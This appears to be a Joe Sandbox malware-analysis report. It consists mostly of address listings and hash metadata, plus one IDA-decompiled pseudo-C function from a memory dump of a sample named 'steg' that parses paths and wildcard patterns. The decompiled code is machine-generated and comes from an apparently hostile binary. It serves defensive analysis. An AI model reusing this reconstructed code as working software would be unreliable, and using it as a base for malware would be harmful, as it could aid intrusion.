                                                                                                                    0x00f8dc41
                                                                                                                    0x00f8dc45
                                                                                                                    0x00f8dc4f
                                                                                                                    0x00f8dc51
                                                                                                                    0x00f8dc57
                                                                                                                    0x00f8dc6b
                                                                                                                    0x00f8dc7b
                                                                                                                    0x00f8dc83
                                                                                                                    0x00f8dc8a
                                                                                                                    0x00f8dc8b
                                                                                                                    0x00f8dc8d
                                                                                                                    0x00f8dc95
                                                                                                                    0x00f8dc9e
                                                                                                                    0x00f8df03
                                                                                                                    0x00f8df03
                                                                                                                    0x00000000
                                                                                                                    0x00f8dca4
                                                                                                                    0x00f8dca4
                                                                                                                    0x00f8dcaa
                                                                                                                    0x00f8dcb2
                                                                                                                    0x00f8dcb3
                                                                                                                    0x00f8dcb9
                                                                                                                    0x00f8def7
                                                                                                                    0x00f8def7
                                                                                                                    0x00f8df00
                                                                                                                    0x00000000
                                                                                                                    0x00f8dcbf
                                                                                                                    0x00f8dcbf
                                                                                                                    0x00f8dccd
                                                                                                                    0x00f8dcce
                                                                                                                    0x00f8dcd4
                                                                                                                    0x00f8dcd5
                                                                                                                    0x00f8dcd7
                                                                                                                    0x00f8dcdd
                                                                                                                    0x00f8deeb
                                                                                                                    0x00f8deeb
                                                                                                                    0x00f8def4
                                                                                                                    0x00000000
                                                                                                                    0x00f8dce3
                                                                                                                    0x00f8dce3
                                                                                                                    0x00f8dce9
                                                                                                                    0x00f8dce9
                                                                                                                    0x00f8dcf1
                                                                                                                    0x00000000
                                                                                                                    0x00f8dcf7
                                                                                                                    0x00f8dd04
                                                                                                                    0x00f8dd09
                                                                                                                    0x00f8dd0f
                                                                                                                    0x00f8dd12
                                                                                                                    0x00f8dd17
                                                                                                                    0x00f8dd17
                                                                                                                    0x00f8dd1a
                                                                                                                    0x00f8dd1d
                                                                                                                    0x00f8dd31
                                                                                                                    0x00f8dd3c
                                                                                                                    0x00f8dd3e
                                                                                                                    0x00f8dd3f
                                                                                                                    0x00f8dd44
                                                                                                                    0x00f8dd49
                                                                                                                    0x00f8dd4d
                                                                                                                    0x00f8dd4d
                                                                                                                    0x00f8dd50
                                                                                                                    0x00f8dd56
                                                                                                                    0x00f8dd59
                                                                                                                    0x00f8dd59
                                                                                                                    0x00f8dd5c
                                                                                                                    0x00f8dd5f
                                                                                                                    0x00f8dd66
                                                                                                                    0x00f8dd71
                                                                                                                    0x00f8dd8f
                                                                                                                    0x00f8dd9d
                                                                                                                    0x00f8dda2
                                                                                                                    0x00f8dda7
                                                                                                                    0x00f8ddc7
                                                                                                                    0x00f8ddda
                                                                                                                    0x00f8dddf
                                                                                                                    0x00f8dde5
                                                                                                                    0x00f8dde8
                                                                                                                    0x00f8ddeb
                                                                                                                    0x00f8ddeb
                                                                                                                    0x00f8dded
                                                                                                                    0x00f8ddee
                                                                                                                    0x00f8ddf7
                                                                                                                    0x00f8ddff
                                                                                                                    0x00f8de01
                                                                                                                    0x00f8de07
                                                                                                                    0x00f8de09
                                                                                                                    0x00f8de11
                                                                                                                    0x00f8de16
                                                                                                                    0x00f8de1b
                                                                                                                    0x00f8de2b
                                                                                                                    0x00f8de30
                                                                                                                    0x00f8de30
                                                                                                                    0x00f8de33
                                                                                                                    0x00f8de36
                                                                                                                    0x00f8de36
                                                                                                                    0x00f8de09
                                                                                                                    0x00f8de4a
                                                                                                                    0x00f8de62
                                                                                                                    0x00f8de67
                                                                                                                    0x00f8de6d
                                                                                                                    0x00f8de70
                                                                                                                    0x00f8de77
                                                                                                                    0x00f8de77
                                                                                                                    0x00f8de79
                                                                                                                    0x00f8de7a
                                                                                                                    0x00f8de83
                                                                                                                    0x00f8de89
                                                                                                                    0x00f8de8f
                                                                                                                    0x00f8de97
                                                                                                                    0x00f8de9f
                                                                                                                    0x00f8dea4
                                                                                                                    0x00f8dea9
                                                                                                                    0x00f8deb9
                                                                                                                    0x00f8debe
                                                                                                                    0x00f8debe
                                                                                                                    0x00f8dec1
                                                                                                                    0x00f8dec4
                                                                                                                    0x00f8dec4
                                                                                                                    0x00f8de97
                                                                                                                    0x00f8de83
                                                                                                                    0x00f8dda9
                                                                                                                    0x00f8ddb7
                                                                                                                    0x00f8ddbc
                                                                                                                    0x00f8ddc1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8ddc1
                                                                                                                    0x00000000
                                                                                                                    0x00f8dd73
                                                                                                                    0x00f8dd73
                                                                                                                    0x00f8dd7f
                                                                                                                    0x00f8df1a
                                                                                                                    0x00f8df1f
                                                                                                                    0x00f8df20
                                                                                                                    0x00f8df21
                                                                                                                    0x00f8df22
                                                                                                                    0x00f8df23
                                                                                                                    0x00f8df24
                                                                                                                    0x00f8df25
                                                                                                                    0x00f8df26
                                                                                                                    0x00f8df28
                                                                                                                    0x00f8df3d
                                                                                                                    0x00f8df47
                                                                                                                    0x00f8df49
                                                                                                                    0x00f8df53
                                                                                                                    0x00f8df59
                                                                                                                    0x00f8df68
                                                                                                                    0x00f8df75
                                                                                                                    0x00f8df79
                                                                                                                    0x00f8df92
                                                                                                                    0x00f8df96
                                                                                                                    0x00f8dfaa
                                                                                                                    0x00f8dfb2
                                                                                                                    0x00f8dfb7
                                                                                                                    0x00f8dfb7
                                                                                                                    0x00f8dfba
                                                                                                                    0x00f8dfbc
                                                                                                                    0x00f8dfbe
                                                                                                                    0x00f8dfc6
                                                                                                                    0x00f8dfc7
                                                                                                                    0x00f8dfd5
                                                                                                                    0x00000000
                                                                                                                    0x00f8dfd7
                                                                                                                    0x00f8dfd7
                                                                                                                    0x00f8dfdd
                                                                                                                    0x00f8dfe1
                                                                                                                    0x00f8dfed
                                                                                                                    0x00f8dfef
                                                                                                                    0x00f8dff4
                                                                                                                    0x00f8dff4
                                                                                                                    0x00f8e001
                                                                                                                    0x00f8e002
                                                                                                                    0x00f8e004
                                                                                                                    0x00f8e006
                                                                                                                    0x00f8e00c
                                                                                                                    0x00f8e03e
                                                                                                                    0x00f8e046
                                                                                                                    0x00000000
                                                                                                                    0x00f8e048
                                                                                                                    0x00f8e048
                                                                                                                    0x00f8e057
                                                                                                                    0x00f8e059
                                                                                                                    0x00f8e05b
                                                                                                                    0x00f8e061
                                                                                                                    0x00f8e062
                                                                                                                    0x00f8e064
                                                                                                                    0x00f8e06a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e070
                                                                                                                    0x00f8e082
                                                                                                                    0x00f8e086
                                                                                                                    0x00f8e08e
                                                                                                                    0x00f8e09f
                                                                                                                    0x00f8e0a4
                                                                                                                    0x00f8e0a7
                                                                                                                    0x00f8e0ad
                                                                                                                    0x00f8e0b1
                                                                                                                    0x00f8e0bd
                                                                                                                    0x00000000
                                                                                                                    0x00f8e0c3
                                                                                                                    0x00f8e0cb
                                                                                                                    0x00f8e0cc
                                                                                                                    0x00f8e0d4
                                                                                                                    0x00f8e0d5
                                                                                                                    0x00f8e0d7
                                                                                                                    0x00f8e0dd
                                                                                                                    0x00f8e117
                                                                                                                    0x00f8e117
                                                                                                                    0x00f8e11f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e129
                                                                                                                    0x00f8e133
                                                                                                                    0x00f8e138
                                                                                                                    0x00000000
                                                                                                                    0x00f8e13a
                                                                                                                    0x00f8e13a
                                                                                                                    0x00f8e140
                                                                                                                    0x00f8e144
                                                                                                                    0x00f8e14c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e152
                                                                                                                    0x00f8e15a
                                                                                                                    0x00f8e15b
                                                                                                                    0x00f8e163
                                                                                                                    0x00f8e16a
                                                                                                                    0x00f8e16b
                                                                                                                    0x00f8e16d
                                                                                                                    0x00f8e173
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e1af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e1b7
                                                                                                                    0x00f8e1b9
                                                                                                                    0x00f8e1bf
                                                                                                                    0x00f8e1c0
                                                                                                                    0x00f8e1c2
                                                                                                                    0x00f8e1c8
                                                                                                                    0x00000000
                                                                                                                    0x00f8e1ca
                                                                                                                    0x00f8e1d7
                                                                                                                    0x00f8e1ea
                                                                                                                    0x00f8e1fd
                                                                                                                    0x00f8e210
                                                                                                                    0x00f8e22c
                                                                                                                    0x00f8e247
                                                                                                                    0x00f8e258
                                                                                                                    0x00f8e25d
                                                                                                                    0x00f8e263
                                                                                                                    0x00f8e266
                                                                                                                    0x00f8e270
                                                                                                                    0x00f8e27c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e282
                                                                                                                    0x00f8e284
                                                                                                                    0x00f8e286
                                                                                                                    0x00f8e28e
                                                                                                                    0x00f8e295
                                                                                                                    0x00f8e296
                                                                                                                    0x00f8e2a2
                                                                                                                    0x00f8e2a9
                                                                                                                    0x00f8e2aa
                                                                                                                    0x00f8e2ac
                                                                                                                    0x00f8e2b2
                                                                                                                    0x00f8e2cb
                                                                                                                    0x00f8e2d1
                                                                                                                    0x00f8e2d7
                                                                                                                    0x00f8e2dc
                                                                                                                    0x00f8e33f
                                                                                                                    0x00f8e344
                                                                                                                    0x00000000
                                                                                                                    0x00f8e2de
                                                                                                                    0x00f8e2de
                                                                                                                    0x00f8e2e0
                                                                                                                    0x00f8e2e4
                                                                                                                    0x00f8e2e6
                                                                                                                    0x00f8e2ec
                                                                                                                    0x00f8e2ec
                                                                                                                    0x00f8e2f9
                                                                                                                    0x00f8e2fc
                                                                                                                    0x00f8e303
                                                                                                                    0x00f8e306
                                                                                                                    0x00f8e307
                                                                                                                    0x00f8e30b
                                                                                                                    0x00f8e30b
                                                                                                                    0x00f8e311
                                                                                                                    0x00f8e318
                                                                                                                    0x00f8e52c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e31e
                                                                                                                    0x00f8e31e
                                                                                                                    0x00f8e347
                                                                                                                    0x00f8e353
                                                                                                                    0x00f8e357
                                                                                                                    0x00f8e359
                                                                                                                    0x00f8e370
                                                                                                                    0x00f8e372
                                                                                                                    0x00f8e377
                                                                                                                    0x00f8e379
                                                                                                                    0x00f8e389
                                                                                                                    0x00f8e3a1
                                                                                                                    0x00f8e3a4
                                                                                                                    0x00f8e3a9
                                                                                                                    0x00f8e3a9
                                                                                                                    0x00f8e3c3
                                                                                                                    0x00f8e3c8
                                                                                                                    0x00f8e3c8
                                                                                                                    0x00f8e3cb
                                                                                                                    0x00f8e3d6
                                                                                                                    0x00f8e3db
                                                                                                                    0x00000000
                                                                                                                    0x00f8e3e1
                                                                                                                    0x00f8e3ed
                                                                                                                    0x00f8e3f2
                                                                                                                    0x00f8e3f7
                                                                                                                    0x00000000
                                                                                                                    0x00f8e3fd
                                                                                                                    0x00f8e409
                                                                                                                    0x00f8e40e
                                                                                                                    0x00f8e413
                                                                                                                    0x00f8e421
                                                                                                                    0x00f8e426
                                                                                                                    0x00f8e429
                                                                                                                    0x00f8e429
                                                                                                                    0x00f8e439
                                                                                                                    0x00f8e448
                                                                                                                    0x00f8e44d
                                                                                                                    0x00f8e452
                                                                                                                    0x00f8e46d
                                                                                                                    0x00f8e46d
                                                                                                                    0x00f8e47d
                                                                                                                    0x00f8e47f
                                                                                                                    0x00f8e484
                                                                                                                    0x00000000
                                                                                                                    0x00f8e48a
                                                                                                                    0x00f8e48a
                                                                                                                    0x00f8e497
                                                                                                                    0x00f8e49a
                                                                                                                    0x00f8e49f
                                                                                                                    0x00f8e49f
                                                                                                                    0x00f8e4aa
                                                                                                                    0x00f8e4ac
                                                                                                                    0x00f8e4b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e4c0
                                                                                                                    0x00f8e4c3
                                                                                                                    0x00f8e4df
                                                                                                                    0x00f8e4e4
                                                                                                                    0x00f8e4ed
                                                                                                                    0x00f8e4ef
                                                                                                                    0x00f8e4f4
                                                                                                                    0x00000000
                                                                                                                    0x00f8e4f6
                                                                                                                    0x00f8e197
                                                                                                                    0x00f8e197
                                                                                                                    0x00000000
                                                                                                                    0x00f8e197
                                                                                                                    0x00000000
                                                                                                                    0x00f8e4f4
                                                                                                                    0x00f8e4fb
                                                                                                                    0x00f8e503
                                                                                                                    0x00f8e51f
                                                                                                                    0x00f8e524
                                                                                                                    0x00000000
                                                                                                                    0x00f8e524
                                                                                                                    0x00f8e454
                                                                                                                    0x00f8e45d
                                                                                                                    0x00f8e462
                                                                                                                    0x00f8e467
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e467
                                                                                                                    0x00f8e452
                                                                                                                    0x00f8e3f7
                                                                                                                    0x00000000
                                                                                                                    0x00f8e3db
                                                                                                                    0x00f8e318
                                                                                                                    0x00f8e2b4
                                                                                                                    0x00f8e2bb
                                                                                                                    0x00000000
                                                                                                                    0x00f8e2bb
                                                                                                                    0x00f8e2b2
                                                                                                                    0x00f8e27c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e1c8
                                                                                                                    0x00000000
                                                                                                                    0x00f8e175
                                                                                                                    0x00f8e17c
                                                                                                                    0x00f8e181
                                                                                                                    0x00f8e181
                                                                                                                    0x00f8e187
                                                                                                                    0x00f8e18d
                                                                                                                    0x00f8e192
                                                                                                                    0x00f8e192
                                                                                                                    0x00000000
                                                                                                                    0x00f8e18d
                                                                                                                    0x00f8e173
                                                                                                                    0x00f8e14c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e138
                                                                                                                    0x00000000
                                                                                                                    0x00f8e0df
                                                                                                                    0x00f8e0e6
                                                                                                                    0x00f8e0eb
                                                                                                                    0x00f8e0eb
                                                                                                                    0x00f8e0f1
                                                                                                                    0x00f8e0f7
                                                                                                                    0x00f8e0fc
                                                                                                                    0x00f8e0fc
                                                                                                                    0x00f8e0ff
                                                                                                                    0x00f8e107
                                                                                                                    0x00000000
                                                                                                                    0x00f8e10d
                                                                                                                    0x00000000
                                                                                                                    0x00f8e10d
                                                                                                                    0x00f8e107
                                                                                                                    0x00f8e0dd
                                                                                                                    0x00000000
                                                                                                                    0x00f8e0bd
                                                                                                                    0x00f8e531
                                                                                                                    0x00f8e531
                                                                                                                    0x00f8e537
                                                                                                                    0x00f8e53d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e53d
                                                                                                                    0x00f8e00e
                                                                                                                    0x00f8e015
                                                                                                                    0x00f8e01b
                                                                                                                    0x00f8e021
                                                                                                                    0x00f8e027
                                                                                                                    0x00f8e02d
                                                                                                                    0x00f8e033
                                                                                                                    0x00f8e036
                                                                                                                    0x00f8e036
                                                                                                                    0x00f8e02d
                                                                                                                    0x00f8e00c
                                                                                                                    0x00f8df98
                                                                                                                    0x00f8df98
                                                                                                                    0x00f8df9e
                                                                                                                    0x00f8df9f
                                                                                                                    0x00f8df9f
                                                                                                                    0x00f8df7b
                                                                                                                    0x00f8df7b
                                                                                                                    0x00f8df7b
                                                                                                                    0x00f8e543
                                                                                                                    0x00f8e543
                                                                                                                    0x00f8e549
                                                                                                                    0x00f8e552
                                                                                                                    0x00f8e557
                                                                                                                    0x00f8e557
                                                                                                                    0x00f8e55d
                                                                                                                    0x00f8e565
                                                                                                                    0x00f8e566
                                                                                                                    0x00f8e567
                                                                                                                    0x00f8e575
                                                                                                                    0x00f8dd85
                                                                                                                    0x00f8dd85
                                                                                                                    0x00f8dd87
                                                                                                                    0x00000000
                                                                                                                    0x00f8dd87
                                                                                                                    0x00f8dd7f
                                                                                                                    0x00f8dd71
                                                                                                                    0x00000000
                                                                                                                    0x00f8dec7
                                                                                                                    0x00f8dec7
                                                                                                                    0x00f8ded5
                                                                                                                    0x00f8ded6
                                                                                                                    0x00f8dedc
                                                                                                                    0x00f8dedd
                                                                                                                    0x00f8dedf
                                                                                                                    0x00f8dee3
                                                                                                                    0x00000000
                                                                                                                    0x00f8dce9
                                                                                                                    0x00f8dcdd
                                                                                                                    0x00f8dcb9
                                                                                                                    0x00f8dc9e
                                                                                                                    0x00f8db94
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: /
                                                                                                                    • API String ID: 0-2043925204
                                                                                                                    • Opcode ID: 91da3a7d1fea06831c9ce283baa84c15a02fbe219801259a92efa3d4b56e8cd7
                                                                                                                    • Instruction ID: 157ef9637391be0cfa8877a163ec01ce03e954ae4ceff4db7b5ffb3a97276dd4
                                                                                                                    • Opcode Fuzzy Hash: 91da3a7d1fea06831c9ce283baa84c15a02fbe219801259a92efa3d4b56e8cd7
                                                                                                                    • Instruction Fuzzy Hash: FCD17372D001189BDF24EAA0CC85BEA737DFF44354F0444EAEA0DA7181E775AF869B64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F90957 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 340COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00F90957(void* __ebx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v24;
				short _v28;
				intOrPtr _v32;
				char _v40;
				short _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v592;
				char _v10831;
				char _v10832;
				char _v15832;
				char _v26072;
				char _v26076;
				char _v26080;
				void* __edi;
				void* __esi;
				void* _t97;
				void* _t102;
				void* _t108;
				intOrPtr* _t110;
				char _t112;
				void* _t117;
				void* _t121;
				void* _t130;
				intOrPtr _t131;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t153;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr* _t160;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr _t166;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				signed int _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;

				_t166 = __edx;
				_t155 = __ebx;
				E00FE7307(0x65dc);
				_v8 =  *0x481f80 ^ _t177;
				asm("movq xmm0, [0x47221c]");
				_v16 =  *0x472224;
				_v12 =  *0x472228;
				_v32 =  *0x472234;
				asm("movq [ebp-0x14], xmm0");
				asm("movq xmm0, [0x47222c]");
				_v28 =  *0x472238 & 0x0000ffff;
				_t173 = _a4;
				asm("movq [ebp-0x24], xmm0");
				asm("movq xmm0, [0x47223c]");
				_v48 =  *0x472244;
				asm("movq [ebp-0x34], xmm0");
				asm("movq xmm0, [0x47224c]");
				_v44 =  *0x472248 & 0x0000ffff;
				asm("movq [ebp-0x44], xmm0");
				asm("movq xmm0, [0x472254]");
				_t168 = 3;
				asm("movq [ebp-0x3c], xmm0");
				_v26076 = 3;
				E00FE7AF9( &_v592, 0x208, _a4);
				E00FE7B4E( &_v592, 0x208,  &_v72);
				_t179 = _t178 + 0x18;
				_push( &_v592);
				if( *0x47011c() == 0xffffffff) {
					 *0x470124();
					E00FE7AF9( &_v592, 0x208, _t173);
					E00FE7B4E( &_v592, 0x208,  &_v56);
					_t97 = E00F91127( &_v592);
					_t180 = _t179 + 0x1c;
					if(_t97 != 0) {
						L9:
						_t99 = E00F91177( &_v10832, 0x2800);
						_t181 = _t180 + 8;
						if(_t99 != 0) {
							if(_t168 != 1) {
								if(_t168 != 2) {
									goto L26;
								} else {
									_t162 = 0x472260;
									_t136 =  &_v10832;
									while(1) {
										_t166 =  *_t136;
										if(_t166 !=  *_t162) {
											goto L24;
										}
										if(_t166 == 0) {
											goto L23;
										} else {
											_t166 =  *((intOrPtr*)(_t136 + 1));
											if(_t166 !=  *((intOrPtr*)(_t162 + 1))) {
												goto L24;
											} else {
												_t136 = _t136 + 2;
												_t162 = _t162 + 2;
												if(_t166 != 0) {
													continue;
												} else {
													goto L23;
												}
											}
										}
										goto L25;
									}
									goto L24;
								}
							} else {
								_t163 = 0x47225c;
								_t136 =  &_v10832;
								while(1) {
									_t166 =  *_t136;
									if(_t166 !=  *_t163) {
										break;
									}
									if(_t166 == 0) {
										L23:
										_t99 = 0;
									} else {
										_t166 =  *((intOrPtr*)(_t136 + 1));
										if(_t166 !=  *((intOrPtr*)(_t163 + 1))) {
											break;
										} else {
											_t136 = _t136 + 2;
											_t163 = _t163 + 2;
											if(_t166 != 0) {
												continue;
											} else {
												_t99 = 0;
											}
										}
									}
									L25:
									if(_t99 == 0) {
										L26:
										_t102 = E00F91177( &_v10832, 0x2800);
										_t182 = _t181 + 8;
										if(_t102 != 0) {
											do {
												_t160 =  &_v10832;
												_t166 = _t160 + 1;
												do {
													_t131 =  *_t160;
													_t160 = _t160 + 1;
												} while (_t131 != 0);
												_t161 = _t160 == _t166;
												if(_t160 == _t166 || _v10832 != 0x2e) {
													goto L31;
												}
												goto L32;
												L31:
												E00F8BE37(_t161,  &_v10832);
												_t135 = E00F91177( &_v10832, 0x2800);
												_t182 = _t182 + 0xc;
											} while (_t135 != 0);
										}
										L32:
										_t99 = E00F91177( &_v10832, 0x2800);
										_t183 = _t182 + 8;
										if(_t99 != 0) {
											_push(_t155);
											do {
												E00FE7AF9( &_v15832, 0x1388,  &_v10832);
												_t156 = 0;
												_t175 = 0;
												_t108 = E00F91177( &_v10832, 0x2800);
												_t184 = _t183 + 0x14;
												if(_t108 != 0) {
													do {
														_t110 =  &_v10832;
														_t166 = _t110 + 1;
														do {
															_t159 =  *_t110;
															_t110 = _t110 + 1;
														} while (_t159 != 0);
														if(_t110 - _t166 < 3) {
															L40:
															_t112 = _v10832;
															if(_t112 == 0x2e) {
																goto L56;
															} else {
																if(_t168 < 2 || _t175 != 2) {
																	if(_t112 != 0x2a) {
																		E00FE7AF9( &_v26072, 0x2800,  &_v10832);
																		_t117 = E00F91177( &_v10832, 0x2800);
																		_t184 = _t184 + 0x14;
																		_t170 = 0;
																	} else {
																		E00FE7AF9( &_v26072, 0x2800,  &_v10831);
																		_t117 = E00F91177( &_v10832, 0x2800);
																		_t184 = _t184 + 0x14;
																		_t170 = 1;
																	}
																	if(_t117 == 0) {
																		goto L56;
																	} else {
																		_v26080 = 0;
																		_t99 = E00F90637(_t156, _t166, _t170,  &_v10832,  &_v26080);
																		_t184 = _t184 + 8;
																		if(_t99 == 1) {
																			if(_t170 != 0) {
																				if(_t156 != 0) {
																					_t122 = _v26080;
																					if(_v26080 != 0) {
																						E00F8EF07(_a12,  &_v15832, _t156, _t122);
																						_t184 = _t184 + 0x10;
																					}
																				}
																			} else {
																				_t156 = _v26080;
																			}
																			_t168 = _v26076;
																			_t175 = _t175 + 1;
																			goto L55;
																		}
																	}
																} else {
																	_t175 = 0;
																	goto L55;
																}
															}
														} else {
															_t130 = E00FEA4C7( &_v10832, 0x472264, 3);
															_t184 = _t184 + 0xc;
															if(_t130 == 0) {
																goto L55;
															} else {
																goto L40;
															}
														}
														goto L57;
														L55:
														_t121 = E00F91177( &_v10832, 0x2800);
														_t184 = _t184 + 8;
													} while (_t121 != 0);
												}
												goto L56;
												L56:
												_t99 = E00F91177( &_v10832, 0x2800);
												_t168 = _v26076;
												_t183 = _t184 + 8;
											} while (_t99 != 0);
											L57:
											_pop(_t155);
										}
									}
									goto L58;
								}
								L24:
								asm("sbb eax, eax");
								_t99 = _t136 | 0x00000001;
								goto L25;
							}
						}
					} else {
						E00FE7AF9( &_v592, 0x208, _t173);
						E00FE7B4E( &_v592, 0x208,  &_v40);
						_t143 = E00F91127( &_v592);
						_t180 = _t180 + 0x1c;
						if(_t143 != 0) {
							_t168 = 2;
							goto L8;
						} else {
							E00FE7AF9( &_v592, 0x208, _t173);
							E00FE7B4E( &_v592, 0x208,  &_v24);
							_t99 = E00F91127( &_v592);
							_t180 = _t180 + 0x1c;
							if(_t99 != 0) {
								_t168 = 1;
								L8:
								_v26076 = _t168;
								goto L9;
							}
						}
					}
					goto L58;
				} else {
					_push(0);
					_push(1);
					_v26076 = 0;
					if(E00F97A57( &_v592,  &_v26076) != 0) {
						L58:
						_pop(_t169);
						_pop(_t174);
						return E00FE72F2(_t99, _t155, _v8 ^ _t177, _t166, _t169, _t174);
					} else {
						E00F90797(__ebx, 3, _v26076, _a12);
						_t153 = E00F94A77(__ebx, _t173, _v26076);
						_pop(_t171);
						_pop(_t176);
						return E00FE72F2(_t153, __ebx, _v8 ^ _t177, _t166, _t171, _t176);
					}
				}
			}
























































                                                                                                                    0x00f90957
                                                                                                                    0x00f90957
                                                                                                                    0x00f9095f
                                                                                                                    0x00f9096b
                                                                                                                    0x00f90973
                                                                                                                    0x00f9097b
                                                                                                                    0x00f90983
                                                                                                                    0x00f9098b
                                                                                                                    0x00f90995
                                                                                                                    0x00f9099a
                                                                                                                    0x00f909a2
                                                                                                                    0x00f909ac
                                                                                                                    0x00f909af
                                                                                                                    0x00f909b4
                                                                                                                    0x00f909bc
                                                                                                                    0x00f909c7
                                                                                                                    0x00f909cc
                                                                                                                    0x00f909d5
                                                                                                                    0x00f909d9
                                                                                                                    0x00f909de
                                                                                                                    0x00f909f1
                                                                                                                    0x00f909f7
                                                                                                                    0x00f909fc
                                                                                                                    0x00f90a02
                                                                                                                    0x00f90a17
                                                                                                                    0x00f90a1c
                                                                                                                    0x00f90a25
                                                                                                                    0x00f90a2f
                                                                                                                    0x00f90a89
                                                                                                                    0x00f90a9c
                                                                                                                    0x00f90ab1
                                                                                                                    0x00f90abd
                                                                                                                    0x00f90ac2
                                                                                                                    0x00f90ac7
                                                                                                                    0x00f90b57
                                                                                                                    0x00f90b63
                                                                                                                    0x00f90b68
                                                                                                                    0x00f90b6d
                                                                                                                    0x00f90b76
                                                                                                                    0x00f90baa
                                                                                                                    0x00000000
                                                                                                                    0x00f90bac
                                                                                                                    0x00f90bac
                                                                                                                    0x00f90bb1
                                                                                                                    0x00f90bb7
                                                                                                                    0x00f90bb7
                                                                                                                    0x00f90bbb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f90bbf
                                                                                                                    0x00000000
                                                                                                                    0x00f90bc1
                                                                                                                    0x00f90bc1
                                                                                                                    0x00f90bc7
                                                                                                                    0x00000000
                                                                                                                    0x00f90bc9
                                                                                                                    0x00f90bc9
                                                                                                                    0x00f90bcc
                                                                                                                    0x00f90bd1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f90bd1
                                                                                                                    0x00f90bc7
                                                                                                                    0x00000000
                                                                                                                    0x00f90bbf
                                                                                                                    0x00000000
                                                                                                                    0x00f90bb7
                                                                                                                    0x00f90b78
                                                                                                                    0x00f90b78
                                                                                                                    0x00f90b7d
                                                                                                                    0x00f90b87
                                                                                                                    0x00f90b87
                                                                                                                    0x00f90b8b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f90b8f
                                                                                                                    0x00f90bd3
                                                                                                                    0x00f90bd3
                                                                                                                    0x00f90b91
                                                                                                                    0x00f90b91
                                                                                                                    0x00f90b97
                                                                                                                    0x00000000
                                                                                                                    0x00f90b99
                                                                                                                    0x00f90b99
                                                                                                                    0x00f90b9c
                                                                                                                    0x00f90ba1
                                                                                                                    0x00000000
                                                                                                                    0x00f90ba3
                                                                                                                    0x00f90ba3
                                                                                                                    0x00f90ba3
                                                                                                                    0x00f90ba1
                                                                                                                    0x00f90b97
                                                                                                                    0x00f90bdc
                                                                                                                    0x00f90bde
                                                                                                                    0x00f90be4
                                                                                                                    0x00f90bf0
                                                                                                                    0x00f90bf5
                                                                                                                    0x00f90bfa
                                                                                                                    0x00f90bfc
                                                                                                                    0x00f90bfc
                                                                                                                    0x00f90c02
                                                                                                                    0x00f90c07
                                                                                                                    0x00f90c07
                                                                                                                    0x00f90c09
                                                                                                                    0x00f90c0a
                                                                                                                    0x00f90c0e
                                                                                                                    0x00f90c10
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f90c1b
                                                                                                                    0x00f90c22
                                                                                                                    0x00f90c33
                                                                                                                    0x00f90c38
                                                                                                                    0x00f90c3b
                                                                                                                    0x00f90bfc
                                                                                                                    0x00f90c3f
                                                                                                                    0x00f90c4b
                                                                                                                    0x00f90c50
                                                                                                                    0x00f90c55
                                                                                                                    0x00f90c5b
                                                                                                                    0x00f90c67
                                                                                                                    0x00f90c7a
                                                                                                                    0x00f90c8b
                                                                                                                    0x00f90c8d
                                                                                                                    0x00f90c8f
                                                                                                                    0x00f90c94
                                                                                                                    0x00f90c99
                                                                                                                    0x00f90ca7
                                                                                                                    0x00f90ca7
                                                                                                                    0x00f90cad
                                                                                                                    0x00f90cb7
                                                                                                                    0x00f90cb7
                                                                                                                    0x00f90cb9
                                                                                                                    0x00f90cba
                                                                                                                    0x00f90cc3
                                                                                                                    0x00f90ce3
                                                                                                                    0x00f90ce3
                                                                                                                    0x00f90ceb
                                                                                                                    0x00000000
                                                                                                                    0x00f90cf1
                                                                                                                    0x00f90cf4
                                                                                                                    0x00f90d04
                                                                                                                    0x00f90d4c
                                                                                                                    0x00f90d5d
                                                                                                                    0x00f90d62
                                                                                                                    0x00f90d65
                                                                                                                    0x00f90d06
                                                                                                                    0x00f90d19
